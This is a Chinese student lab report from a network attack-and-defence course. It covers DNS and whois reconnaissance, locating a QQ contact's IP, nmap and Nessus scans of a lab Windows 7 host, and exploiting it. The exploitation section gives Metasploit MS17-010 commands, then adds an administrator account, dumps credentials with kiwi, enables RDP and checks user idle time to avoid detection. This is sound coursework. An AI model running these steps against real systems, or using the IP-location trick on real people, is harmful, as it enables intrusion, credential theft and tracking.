20212421 2021-2022-2 《网络与系统攻防技术》实验五实验报告
一、实验内容
(一)从besti.edu.cn中选择一个DNS域名进行查询,获取如下信息:
DNS注册人及联系方式
该域名对应IP地址
IP地址注册人及联系方式
IP地址所在国家、城市和具体地理位置
PS:使用whois、dig、nslookup、traceroute、以及各类在线和离线工具进行搜集信息
(二)尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置
(三)使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令
靶机IP地址是否活跃
靶机开放了哪些TCP和UDP端口
靶机安装了什么操作系统,版本是多少
靶机上安装了哪些服务
(四)使用Nessus开源软件对靶机环境进行扫描,回答以下问题并给出操作命令
靶机上开放了哪些端口
靶机各个端口上网络服务存在哪些安全漏洞
你认为如何攻陷靶机环境,以获得系统访问权
(五)网上足迹搜索
①通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题
②并练习使用Google hack搜集技能完成搜索
二、实验过程
(一)从besti.edu.cn中选择一个DNS域名进行查询,获取如下信息
1.DNS注册人及联系方式
使用whois命令进行相关用户的账户和域名信息查询:
发现连接失败了,可能是防火墙的原因。尝试一下其他网址的相关信息查询,如bilibili.com:
成功查询到了DNS的注册人(Alibaba cloud Computing(Beijing)co.,Ltd.)和联系方式(Email:DomainAbuse@service.aliyun.com;phone:+86.95187)。
但用whois命令查询besti.edu.cn的DNS注册人及联系方式失败了。
2.该域名对应IP地址
1:使用搜索引擎
2:使用IP查询平台(IP查询或者IP地址查询)
3:nslookup
发现无法找到besti.edu.cn,但其他的网址是可查询的,可能前者设置了防火墙,或者进行了查询限制。
4:dig
这个也失败了。
两种方式都失败后,无奈直接用了besti.edu.cn的IP地址(202.205.232.1),用host命令反过来查询该网址主机名:
发现前面还有ns. 的部分。于是使用ns.besti.edu.cn 进行查询:
成功查到其IP地址。
5:ping 命令
3.IP地址注册人及联系方式
使用whois 命令加上IP地址查询IP地址的注册人和联系方式:
并没有找到相应的注册人,可能是被隐藏了。
4.IP地址所在国家、城市和具体地理位置
1:通过前面的IP查询平台,输入IP地址:
其位于中国北京。
2:使用whois+IP :
也能的大概知道位于中国北京。
3:使用埃文科技查询(有3次免费次数):
(1)IP查询:
(2)域名查询:
(3)traceroute 追踪路由路径
发现无法看到中间经过的路由信息,可能是icmp包出现异常,使用wireshark进行抓包:
主机上的wireshark:
虚拟机上的wireshark:
发现虚拟机上icmp包有几次是超时,接下来全是udp包,而主机上抓到的有icmp的回应包,猜测可能是NAT转换的问题,导致回应的icmp包没有传到虚拟机,所以虚拟机traceroute结果是*。
(二)尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置
在电脑上登陆QQ号,在手机上登录QQ小号:
(1)资源监视器
打开任务管理器,点击“性能”,在页面找到资源监视器,点击进去,找到“网络”页面,观察“网络活动"一栏:
用电脑QQ给小号打电话,接通后就能观察到网络活动的变化:
发现有两个是发送的,对其进行IP查询(前面有查询工具):
发现后一个地址是有点精确的。而前一个地址则在河北石家庄的腾讯云处。
(2)wireshark抓包
打开wireshark,开始抓包,用电脑QQ进行通信,用udp进行筛选:
查询该IP地址:
发现地址结果差不多。
对比了一下手机的IP地址,发现以上地址与手机的IP地址皆不同。可能这是一种保护机制吧,通过转换IP地址进行隐藏。
(三)使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令
1.靶机IP地址是否活跃
查询靶机的IP地址:
根据IP地址和子网掩码,可计算得该网段为: 192.168.223.0/24
在kali虚拟机输入:
nmap -sP 192.168.223.0/24
结果:
靶机和虚拟机的IP都处于活跃状态。
2.靶机开放了哪些TCP和UDP端口
输入:
nmap -sU 192.168.223.131
nmap -sT 192.168.223.131
结果:
可以看出检测出9个开放的tcp端口,6个udp端口。
3.靶机安装了什么操作系统,版本是多少
输入:
nmap -O 192.168.223.131
结果:
发现检测结果为:Microsoft Windows 7|2008|8.1
4.靶机上安装了哪些服务
输入:
nmap -sV -Pn 192.168.223.131
结果:
可以看到开启的服务有:msrpc,netbios-ssn,microsoft-ds。
(四)使用Nessus开源软件对靶机环境进行扫描,回答以下问题并给出操作命令
0.下载Nessus
下载这部分比较难,和有次实验下载veil差不多,比较繁琐。
Nessus下载链接:https://www.tenable.com/downloads/nessus?loginAttempted=true
选择合适的版本。下载好后将.deb文件传到kali虚拟机里。
输入:
dpkg -i Nessus-10.7.2-ubuntu1404_amd64.deb
根据倒数第二行提示,输入:
/bin/systemctl start nessusd.service //启动nessus
netstat -ntpl|grep nessus//查看服务是否开启
打开Firefox,输入最后一行提供的网址,进入网页:
进入网页后,点击advenced,向下滑动,点击accept,然后选择第一个版本,或者Nessus Expert:
点击continue,这时需要license,输入:
/opt/nessus/sbin/nessuscli fetch --challenge//获取challenge
或者点击上方offline registration,也可以获取到challenge。
获取activation code:https://zh-cn.tenable.com/products/nessus/nessus-essentials?tns_redirect=true
输入姓名邮箱,在邮箱获取到activation code:
输入challenge和activation code:
下载all-2.0.tar.gz(Nessus plugins)和license:
下载好后,打开license,将内容粘贴到之前的需要license的框里,然后创建用户:
shell中,在文件下载的路径下输入,将文件复制到/opt/nessus路径下:
cp all-2.0.tar.gz /opt/nessus
cp nessus.license /opt/nessus
重启Nessus:
service nessusd restart
等待一段时间,安装好plugins(plugin rules会发亮):
1.靶机上开放了哪些端口
点击new scan,选择:
点击三角形运行:
结果为:
靶机为192.168.223.131 ,存在一个critical漏洞,一个high漏洞,3个medium漏洞。点击进入该靶机页面:
点击Nessus SYN scanner(port scanner)查看开放的端口:
有三个开放的tcp端口。但udp端口却没有看到。点击其余的也没有看见udp端口的开放情况。
我新创建一个scan,选择的时host discovery,运行结果为:
发现多了几个,不过都是1024以后的。
2.靶机各个端口上网络服务存在哪些安全漏洞
在第一个创建的scan中,点击靶机查看漏洞:
(1)0/icmp
ICMP Timestamp Request Remote Date Disclosure(ICMP时间戳请求远程日期披露)指的是一种网络安全问题,其中攻击者利用ICMP(Internet Control Message Protocol,互联网控制消息协议)的时间戳请求功能,向目标主机发送请求,以获取其当前时间戳。
这种请求本身可能并不构成直接的安全威胁,但如果被恶意利用,攻击者可以通过观察响应的时间戳等信息,获取目标主机的敏感信息,如系统运行时间、操作系统版本等。更进一步,攻击者还可能利用此漏洞,通过发送大量的恶意请求,占用目标主机的系统资源,导致拒绝服务攻击(DoS攻击)。
(2)445端口:
SMB签名是一种安全机制,用于验证SMB通信中的数据完整性和来源。当签名被禁用时,攻击者可能更容易执行中间人攻击,拦截并篡改通信内容,从而可能导致数据泄露、未经授权的访问或其他安全问题。
(3)49157端口:
MS16-047是一个针对安全帐户管理器(SAM)和本地安全机构(LSAD)远程协议的安全更新。该更新是为了解决Windows系统中存在的一个特定漏洞,这个漏洞可能允许攻击者通过中间人(MiTM)攻击提升特权。
具体来说,当攻击者成功利用这个漏洞时,他们可以强制降低SAM和LSAD通道的身份验证级别,并模拟经过身份验证的用户。这样,攻击者就可能获得对SAM数据库的访问权限,从而进一步实施恶意行为。
(4)445端口:
MS17-010是针对Microsoft Windows SMB(Server Message Block)服务器的一个关键安全更新。SMB是一种网络文件共享协议,广泛应用于Windows操作系统中,用于在计算机之间共享文件和打印机等资源。
MS17-010安全更新主要解决了SMBv1(Server Message Block version 1)协议中的一个严重漏洞。这个漏洞允许远程攻击者通过发送特制的SMB消息来执行任意代码,进而完全控制受影响的系统。攻击者可以利用这个漏洞进行各种恶意活动,如窃取敏感信息、破坏系统数据或执行其他恶意程序。
(5)N/A:
该风险指远程的Windows操作系统版本不再受到官方支持或更新。当操作系统不再受到支持时,可能面临以下问题和风险:
1.安全风险:由于没有官方的安全更新和补丁,操作系统将容易受到已知漏洞和新发现的威胁的攻击。这可能导致恶意软件感染、数据泄露或其他安全事件。
2.功能限制:不支持的操作系统可能无法运行最新的软件或硬件,因为它们可能需要更新版本的操作系统来提供必要的兼容性和功能。
3.技术支持有限:从官方渠道获取技术支持可能变得困难或不可能,因为制造商通常只为其当前支持的操作系统版本提供技术帮助。
4.兼容性问题:与网络中的其他设备或系统的兼容性可能出现问题,因为它们可能依赖于更新的操作系统功能或协议。
5.法规遵从性:在某些行业或地区,使用不受支持的操作系统可能违反法规或标准,特别是在处理敏感数据或执行关键任务时
3.你认为如何攻陷靶机环境,以获得系统访问权
根据前面的风险结果,可是使用MS16-047来提升权限,或者利用MS17-010漏洞来攻陷靶机,获取访问权限。
输入:
msfconsole
search ms17-010
输入:
use 3
set LHOST 192.168.223.128//kaliIP地址
set LPORT 2421
set RHOST 192.168.223.131//靶机IP地址
exploit
可以看出,我们已经获取到了靶机的shell。
输入:
meterpreter > shell
net user 20212421 123456 /add
net localgroup administrators 20212421 /add
以及:
太长了,就直接截了参考的图。
输入:
meterpreter > load kiwi //加载kiwi模块
Loading extension kiwi...Success.
creds_all #列举所有凭据
exit #退出
输入:
meterpreter > run post/windows/manage/enable_rdp //启用目标主机的3389端口远程桌面
meterpreter > idletime //查看远程用户的空闲时长,空闲时间长再进行远程登陆,减小被发现的风险。
输入:
rdesktop 192.168.223.131
再输入用户名和密码:
成功远程登陆。其余攻击可以见实验二 或者实验参考
(五)网上足迹搜索
1.通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题
在浏览器输入姓名搜索:
看起来有很多的商人和我同名同姓。
输入学号搜索:
可以看到我之前写的博客。
2.练习使用Google hack搜集技能完成搜索
(1)filetype
(2)site
(3)经典用法
三、实验问题及解决方案
问题1:Nessus has no plugins
解决方案:下载插件all-2.0.tar.gz,并重启Nessus进行更新。
问题2:Nessus 的license下载
解决方案:输入challenge和activation code,获取并下载插件和license。
四、实验感想
此次实验主要涉及使用工具进行信息搜集,搜集方面如端口、服务、漏洞等,根据漏洞进行攻击等。对于工具的依赖性较强,没有代码上的问题,命令行方面也还好。和实验二差不多的是在Nessus工具上,对于Nessus的下载也是废了很长的时间。可能时网络的问题,在下载.deb文件时,速度很慢,最后是找同学发了一份给我,然后就是插件的下载也很慢,加上更新的时间也用了好几个小时,所以感觉这个实验还是挺耗费时间的。当然最后的结果也都差不多解决了,也学到了很多新的内容。
五、实验参考
1.ubuntu安装Nessus限制版(2020-07)
2.Nessus安装与使用
3.【网络安全】通过kali工具msfconsole利用ms17-010漏洞获取靶机shell以及远程登录
4.Kali–MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)